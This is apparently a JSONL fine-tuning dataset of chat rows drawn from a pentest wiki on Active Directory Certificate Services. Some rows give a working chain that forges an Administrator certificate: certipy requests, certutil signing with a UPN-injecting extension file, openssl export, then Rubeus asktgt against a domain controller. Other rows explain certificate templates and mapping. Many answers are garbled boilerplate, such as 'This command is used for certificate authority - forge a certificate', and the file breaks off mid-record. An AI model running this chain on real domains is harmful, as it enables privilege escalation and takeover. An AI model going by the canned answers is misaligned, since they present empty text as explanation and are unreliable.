"response": "certipy req -target $ADCS_HOST -dc-ip $DC_IP -u \"$USER@$DOMAIN\" -p '$PASSWORD' -template User -ca \ncertipy cert -pfx user_esc12.pfx -nokey -out user_esc12.crt\ncertipy cert -pfx user_esc12.pfx -nocert -out user_esc12.key", "metadata": {"corpus_index": 46, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certipy req -target $ADCS_HOST -dc-ip $DC_IP -u \"$USER@$DOMAIN\" -p '$PASSWORD' -template User -ca `?"}, {"role": "assistant", "content": "This command is used for certificate authority - forge a certificate. Forge a certificate"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certipy req -target $ADCS_HOST -dc-ip $DC_IP -u \"$USER@$DOMAIN\" -p '$PASSWORD' -template User -ca `?", "response": "This command is used for certificate authority - forge a certificate. Forge a certificate", "metadata": {"corpus_index": 46, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the certutil syntax for certificate authority - forge a certificate?"}, {"role": "assistant", "content": "certutil -addstore -user my ./root-ca.cer"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the certutil syntax for certificate authority - forge a certificate?", "response": "certutil -addstore -user my ./root-ca.cer", "metadata": {"corpus_index": 47, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certutil"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Certificate authority - Forge a certificate"}, {"role": "assistant", "content": "certutil -addstore -user my ./root-ca.cer"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Certificate authority - Forge a certificate", "response": "certutil -addstore -user my ./root-ca.cer", "metadata": {"corpus_index": 47, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certutil -addstore -user my ./root-ca.cer`?"}, {"role": "assistant", "content": "This command is used for certificate authority - forge a certificate. Forge a certificate"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certutil -addstore -user my ./root-ca.cer`?", "response": "This command is used for certificate authority - forge a certificate. Forge a certificate", "metadata": {"corpus_index": 47, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the certutil command for certificate authority - forge a certificate"}, {"role": "assistant", "content": "certutil -csp \"YubiHSM Key Storage Provider\" -repairstore -user my "}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the certutil command for certificate authority - forge a certificate", "response": "certutil -csp \"YubiHSM Key Storage Provider\" -repairstore -user my ", "metadata": {"corpus_index": 48, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certutil"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Certificate authority - Forge a certificate"}, {"role": "assistant", "content": "certutil -csp \"YubiHSM Key Storage Provider\" -repairstore -user my "}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Certificate authority - Forge a certificate", "response": "certutil -csp \"YubiHSM Key Storage Provider\" -repairstore -user my ", "metadata": {"corpus_index": 48, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certutil -csp \"YubiHSM Key Storage Provider\" -repairstore -user my `?"}, {"role": "assistant", "content": "This command is used for certificate authority - forge a certificate. Forge a certificate"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certutil -csp \"YubiHSM Key Storage Provider\" -repairstore -user my `?", "response": "This command is used for certificate authority - forge a certificate. Forge a certificate", "metadata": {"corpus_index": 48, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the certutil command for certificate authority - forge a certificate"}, {"role": "assistant", "content": "certutil -sign ./user_esc12.crt new.crt @extension.inf"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the certutil command for certificate authority - forge a certificate", "response": "certutil -sign ./user_esc12.crt new.crt @extension.inf", "metadata": {"corpus_index": 49, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certutil"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Certificate authority - Forge a certificate during a pentest?"}, {"role": "assistant", "content": "certutil -sign ./user_esc12.crt new.crt @extension.inf"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Certificate authority - Forge a certificate during a pentest?", "response": "certutil -sign ./user_esc12.crt new.crt @extension.inf", "metadata": {"corpus_index": 49, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certutil -sign ./user_esc12.crt new.crt @extension.inf`?"}, {"role": "assistant", "content": "This command is used for certificate authority - forge a certificate. Forge a certificate"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certutil -sign ./user_esc12.crt new.crt @extension.inf`?", "response": "This command is used for certificate authority - forge a certificate. Forge a certificate", "metadata": {"corpus_index": 49, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Certificate authority - Forge a certificate"}, {"role": "assistant", "content": "[Extensions]\n2.5.29.17 = \"{text}\"\n_continue_ = \"UPN=Administrator@esc.local&\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Certificate authority - Forge a certificate", "response": "[Extensions]\n2.5.29.17 = \"{text}\"\n_continue_ = \"UPN=Administrator@esc.local&\"", "metadata": {"corpus_index": 50, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `[Extensions]`?"}, {"role": "assistant", "content": "This command is used for certificate authority - forge a certificate. Forge a certificate"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `[Extensions]`?", "response": "This command is used for certificate authority - forge a certificate. Forge a certificate", "metadata": {"corpus_index": 50, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the openssl.exe command to certificate authority - forge a certificate"}, {"role": "assistant", "content": "openssl.exe pkcs12 -export -in new.crt -inkey user_esc12.key -out user_esc12_Administrator.pfx\n\nRubeus.exe asktgt /user:Administrator /certificate:user_esc12_Administrator.pfx /domain:esc.local /dc:192.168.1.2 /show /nowrap"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the openssl.exe command to certificate authority - forge a certificate", "response": "openssl.exe pkcs12 -export -in new.crt -inkey user_esc12.key -out user_esc12_Administrator.pfx\n\nRubeus.exe asktgt /user:Administrator /certificate:user_esc12_Administrator.pfx /domain:esc.local /dc:192.168.1.2 /show /nowrap", "metadata": {"corpus_index": 51, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "openssl.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Certificate authority - Forge a certificate?"}, {"role": "assistant", "content": "openssl.exe pkcs12 -export -in new.crt -inkey user_esc12.key -out user_esc12_Administrator.pfx\n\nRubeus.exe asktgt /user:Administrator /certificate:user_esc12_Administrator.pfx /domain:esc.local /dc:192.168.1.2 /show /nowrap"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Certificate authority - Forge a certificate?", "response": "openssl.exe pkcs12 -export -in new.crt -inkey user_esc12.key -out user_esc12_Administrator.pfx\n\nRubeus.exe asktgt /user:Administrator /certificate:user_esc12_Administrator.pfx /domain:esc.local /dc:192.168.1.2 /show /nowrap", "metadata": {"corpus_index": 51, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `openssl.exe pkcs12 -export -in new.crt -inkey user_esc12.key -out user_esc12_Administrator.pfx`?"}, {"role": "assistant", "content": "This command is used for certificate authority - forge a certificate. Forge a certificate"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `openssl.exe pkcs12 -export -in new.crt -inkey user_esc12.key -out user_esc12_Administrator.pfx`?", "response": "This command is used for certificate authority - forge a certificate. Forge a certificate", "metadata": {"corpus_index": 51, "category": "crypto", "source_file": "docs/src/ad/movement/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Certificate templates - Template theory work?"}, {"role": "assistant", "content": "> AD CS Enterprise CAs issue certificates with settings defined by AD objects known as certificate templates. These templates are collections of enrollment policies and predefined certificate settings and contain things like “_How long is this certificate valid for?_”, _“What is the certificate used for?”,_ “_How is the subject specified?_”, _“Who is allowed to request a certificate?”_, and a myriad of other settings\n>\n> \\[...]\n>\n> There is a specific set of settings for certificate templates that makes them extremely vulnerable. As in regular-domain-user-to-domain-admin vulnerable.\n>\n> (specterops.io)\n\nIn their research papers, Will Schroeder and Lee Christensen found multiple vectors of domain escalation based on certificate template misconfigurations (dubbed ESC1, ESC2 and ESC3).\n\nFollowing this, Olivier Lyak has found two new template misconfigurations (dubbed ESC9 and ESC10).\n\n!Vulnerable configurations for ESC1, ESC2 and ESC3"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Certificate templates - Template theory work?", "response": "> AD CS Enterprise CAs issue certificates with settings defined by AD objects known as certificate templates. These templates are collections of enrollment policies and predefined certificate settings and contain things like “_How long is this certificate valid for?_”, _“What is the certificate used for?”,_ “_How is the subject specified?_”, _“Who is allowed to request a certificate?”_, and a myriad of other settings\n>\n> \\[...]\n>\n> There is a specific set of settings for certificate templates that makes them extremely vulnerable. As in regular-domain-user-to-domain-admin vulnerable.\n>\n> (specterops.io)\n\nIn their research papers, Will Schroeder and Lee Christensen found multiple vectors of domain escalation based on certificate template misconfigurations (dubbed ESC1, ESC2 and ESC3).\n\nFollowing this, Olivier Lyak has found two new template misconfigurations (dubbed ESC9 and ESC10).\n\n!Vulnerable configurations for ESC1, ESC2 and ESC3", "metadata": {"corpus_index": 52, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Certificate templates - Template theory?"}, {"role": "assistant", "content": "> AD CS Enterprise CAs issue certificates with settings defined by AD objects known as certificate templates. These templates are collections of enrollment policies and predefined certificate settings and contain things like “_How long is this certificate valid for?_”, _“What is the certificate used for?”,_ “_How is the subject specified?_”, _“Who is allowed to request a certificate?”_, and a myriad of other settings\n>\n> \\[...]\n>\n> There is a specific set of settings for certificate templates that makes them extremely vulnerable. As in regular-domain-user-to-domain-admin vulnerable.\n>\n> (specterops.io)\n\nIn their research papers, Will Schroeder and Lee Christensen found multiple vectors of domain escalation based on certificate template misconfigurations (dubbed ESC1, ESC2 and ESC3).\n\nFollowing this, Olivier Lyak has found two new template misconfigurations (dubbed ESC9 and ESC10).\n\n!Vulnerable configurations for ESC1, ESC2 and ESC3"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Certificate templates - Template theory?", "response": "> AD CS Enterprise CAs issue certificates with settings defined by AD objects known as certificate templates. These templates are collections of enrollment policies and predefined certificate settings and contain things like “_How long is this certificate valid for?_”, _“What is the certificate used for?”,_ “_How is the subject specified?_”, _“Who is allowed to request a certificate?”_, and a myriad of other settings\n>\n> \\[...]\n>\n> There is a specific set of settings for certificate templates that makes them extremely vulnerable. As in regular-domain-user-to-domain-admin vulnerable.\n>\n> (specterops.io)\n\nIn their research papers, Will Schroeder and Lee Christensen found multiple vectors of domain escalation based on certificate template misconfigurations (dubbed ESC1, ESC2 and ESC3).\n\nFollowing this, Olivier Lyak has found two new template misconfigurations (dubbed ESC9 and ESC10).\n\n!Vulnerable configurations for ESC1, ESC2 and ESC3", "metadata": {"corpus_index": 52, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Certificate templates - Certificate mapping"}, {"role": "assistant", "content": "This section focuses on how a certificate is associated with an account object. Certificate mapping is the part of certificate authentication where the DC takes the principal (user or computer) data provided in the certificate used during authentication, and attempts to map it to a user or computer in the domain.\n\nUnderstanding certificate mapping is essential to understand ESC9, ESC10 and ESC14.\n\nMapping can be implicit or explicit, and strong or weak. These two notions work together, and the mapping of a certificate will use one option of each part (implicit and strong, or explicit and strong, and so on)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Certificate templates - Certificate mapping", "response": "This section focuses on how a certificate is associated with an account object. Certificate mapping is the part of certificate authentication where the DC takes the principal (user or computer) data provided in the certificate used during authentication, and attempts to map it to a user or computer in the domain.\n\nUnderstanding certificate mapping is essential to understand ESC9, ESC10 and ESC14.\n\nMapping can be implicit or explicit, and strong or weak. These two notions work together, and the mapping of a certificate will use one option of each part (implicit and strong, or explicit and strong, and so on).", "metadata": {"corpus_index": 53, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Certificate templates - Certificate mapping"}, {"role": "assistant", "content": "This section focuses on how a certificate is associated with an account object. Certificate mapping is the part of certificate authentication where the DC takes the principal (user or computer) data provided in the certificate used during authentication, and attempts to map it to a user or computer in the domain.\n\nUnderstanding certificate mapping is essential to understand ESC9, ESC10 and ESC14.\n\nMapping can be implicit or explicit, and strong or weak. These two notions work together, and the mapping of a certificate will use one option of each part (implicit and strong, or explicit and strong, and so on)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Certificate templates - Certificate mapping", "response": "This section focuses on how a certificate is associated with an account object. Certificate mapping is the part of certificate authentication where the DC takes the principal (user or computer) data provided in the certificate used during authentication, and attempts to map it to a user or computer in the domain.\n\nUnderstanding certificate mapping is essential to understand ESC9, ESC10 and ESC14.\n\nMapping can be implicit or explicit, and strong or weak. These two notions work together, and the mapping of a certificate will use one option of each part (implicit and strong, or explicit and strong, and so on).", "metadata": {"corpus_index": 53, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Certificate templates - Implicit certificate mapping in the context of penetration testing"}, {"role": "assistant", "content": "With implicit mapping, the information contained in the certificate's SAN (_Subject Alternative Name_) is used to match the UPN attribute (userPrincipalName) for a user or the DNS attribute (dNSHostName) for a machine account. In the case of a user account, the otherName component of the SAN is used, and for a machine account it is dNSName.\n\nIf the UPN mapping fails, the DC will attempt to match the username contained in otherName with the sAMAccountName attribute, and then with sAMAccountName suffixed with a $. Similarly, if DNS mapping fails, the DC will attempt to match the hostname contained in dNSName suffixed with a $ with the sAMAccountName."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Certificate templates - Implicit certificate mapping in the context of penetration testing", "response": "With implicit mapping, the information contained in the certificate's SAN (_Subject Alternative Name_) is used to match the UPN attribute (userPrincipalName) for a user or the DNS attribute (dNSHostName) for a machine account. In the case of a user account, the otherName component of the SAN is used, and for a machine account it is dNSName.\n\nIf the UPN mapping fails, the DC will attempt to match the username contained in otherName with the sAMAccountName attribute, and then with sAMAccountName suffixed with a $. Similarly, if DNS mapping fails, the DC will attempt to match the hostname contained in dNSName suffixed with a $ with the sAMAccountName.", "metadata": {"corpus_index": 54, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Certificate templates - Implicit certificate mapping"}, {"role": "assistant", "content": "With implicit mapping, the information contained in the certificate's SAN (_Subject Alternative Name_) is used to match the UPN attribute (userPrincipalName) for a user or the DNS attribute (dNSHostName) for a machine account. In the case of a user account, the otherName component of the SAN is used, and for a machine account it is dNSName.\n\nIf the UPN mapping fails, the DC will attempt to match the username contained in otherName with the sAMAccountName attribute, and then with sAMAccountName suffixed with a $. Similarly, if DNS mapping fails, the DC will attempt to match the hostname contained in dNSName suffixed with a $ with the sAMAccountName."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Certificate templates - Implicit certificate mapping", "response": "With implicit mapping, the information contained in the certificate's SAN (_Subject Alternative Name_) is used to match the UPN attribute (userPrincipalName) for a user or the DNS attribute (dNSHostName) for a machine account. In the case of a user account, the otherName component of the SAN is used, and for a machine account it is dNSName.\n\nIf the UPN mapping fails, the DC will attempt to match the username contained in otherName with the sAMAccountName attribute, and then with sAMAccountName suffixed with a $. Similarly, if DNS mapping fails, the DC will attempt to match the hostname contained in dNSName suffixed with a $ with the sAMAccountName.", "metadata": {"corpus_index": 54, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Certificate templates - Explicit certificate mapping?"}, {"role": "assistant", "content": "For an explicit match, the altSecurityIdentities attribute of an account (user or machine) must contain the identifiers of the certificates with which it is authorised to authenticate. The certificate must be signed by a trusted certification authority and match one of the values in the altSecurityIdentities attribute.\n\nThe matches that can be added to the attribute are strings that follow a syntax defined with the identifiers of a certificate: \n\n!explicit_mapping.webp\n\nThese identifiers can be found in the various fields of an X509 v3 certificate.\n\nIn AD CS, the certificate template specifies how the CA should populate the Subject field and the SAN extension of the certificate based on the enrollee's AD attributes."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Certificate templates - Explicit certificate mapping?", "response": "For an explicit match, the altSecurityIdentities attribute of an account (user or machine) must contain the identifiers of the certificates with which it is authorised to authenticate. The certificate must be signed by a trusted certification authority and match one of the values in the altSecurityIdentities attribute.\n\nThe matches that can be added to the attribute are strings that follow a syntax defined with the identifiers of a certificate: \n\n!explicit_mapping.webp\n\nThese identifiers can be found in the various fields of an X509 v3 certificate.\n\nIn AD CS, the certificate template specifies how the CA should populate the Subject field and the SAN extension of the certificate based on the enrollee's AD attributes.", "metadata": {"corpus_index": 55, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Certificate templates - Explicit certificate mapping"}, {"role": "assistant", "content": "For an explicit match, the altSecurityIdentities attribute of an account (user or machine) must contain the identifiers of the certificates with which it is authorised to authenticate. The certificate must be signed by a trusted certification authority and match one of the values in the altSecurityIdentities attribute.\n\nThe matches that can be added to the attribute are strings that follow a syntax defined with the identifiers of a certificate: \n\n!explicit_mapping.webp\n\nThese identifiers can be found in the various fields of an X509 v3 certificate.\n\nIn AD CS, the certificate template specifies how the CA should populate the Subject field and the SAN extension of the certificate based on the enrollee's AD attributes."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Certificate templates - Explicit certificate mapping", "response": "For an explicit match, the altSecurityIdentities attribute of an account (user or machine) must contain the identifiers of the certificates with which it is authorised to authenticate. The certificate must be signed by a trusted certification authority and match one of the values in the altSecurityIdentities attribute.\n\nThe matches that can be added to the attribute are strings that follow a syntax defined with the identifiers of a certificate: \n\n!explicit_mapping.webp\n\nThese identifiers can be found in the various fields of an X509 v3 certificate.\n\nIn AD CS, the certificate template specifies how the CA should populate the Subject field and the SAN extension of the certificate based on the enrollee's AD attributes.", "metadata": {"corpus_index": 55, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Certificate templates - Certificate attributes work?"}, {"role": "assistant", "content": "Before explaining weak and strong labels, it is important to talk about certificate attributs. The options in the \"Subject Name\" tab of the Windows Certificate Template Console correspond to the flags in the msPKI-Certificate-Name-Flag attribute of the certificate template. Flags whose names follow the pattern CT_FLAG_SUBJECT_REQUIRE_ relate to the information contained in the Subject field of the certificate, and CT_FLAG_SUBJECT_ALT_REQUIRE_ relates to the SAN extension.\n\nWhen a certificate template requires an attribute from the enrolled account, but the enrolled account does not have that attribute or it is not defined, the behaviour may differ. Most flags are strong requirements (i.e. enrolment fails if the attribute is not defined for the enrolled account), but there are exceptions, as shown in the table below: \n\n!CT_FLAG.webp\n\nSome flags prevent default users/computers from enrolling in a given certificate scheme, because the required attributes are not set by default:\n\n* mail: the mail attribute for users and computers is not set by default\n* dNSHostName: users do not have a dNSHostName attribute, so users cannot enroll in certificate templates requiring dNSHostName; computers will have their dNSHostName attribute set when the computer is attached to a domain, but the attribute will not be set automatically simply by creating a computer object in the AD\n* userPrincipalName: the UPN attribute is not set by default for computers, but it is for users\n* cn : all AD objects have a cn attribute set by default"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Certificate templates - Certificate attributes work?", "response": "Before explaining weak and strong labels, it is important to talk about certificate attributs. The options in the \"Subject Name\" tab of the Windows Certificate Template Console correspond to the flags in the msPKI-Certificate-Name-Flag attribute of the certificate template. Flags whose names follow the pattern CT_FLAG_SUBJECT_REQUIRE_ relate to the information contained in the Subject field of the certificate, and CT_FLAG_SUBJECT_ALT_REQUIRE_ relates to the SAN extension.\n\nWhen a certificate template requires an attribute from the enrolled account, but the enrolled account does not have that attribute or it is not defined, the behaviour may differ. Most flags are strong requirements (i.e. enrolment fails if the attribute is not defined for the enrolled account), but there are exceptions, as shown in the table below: \n\n!CT_FLAG.webp\n\nSome flags prevent default users/computers from enrolling in a given certificate scheme, because the required attributes are not set by default:\n\n* mail: the mail attribute for users and computers is not set by default\n* dNSHostName: users do not have a dNSHostName attribute, so users cannot enroll in certificate templates requiring dNSHostName; computers will have their dNSHostName attribute set when the computer is attached to a domain, but the attribute will not be set automatically simply by creating a computer object in the AD\n* userPrincipalName: the UPN attribute is not set by default for computers, but it is for users\n* cn : all AD objects have a cn attribute set by default", "metadata": {"corpus_index": 56, "category": "active_directory", "source_file": 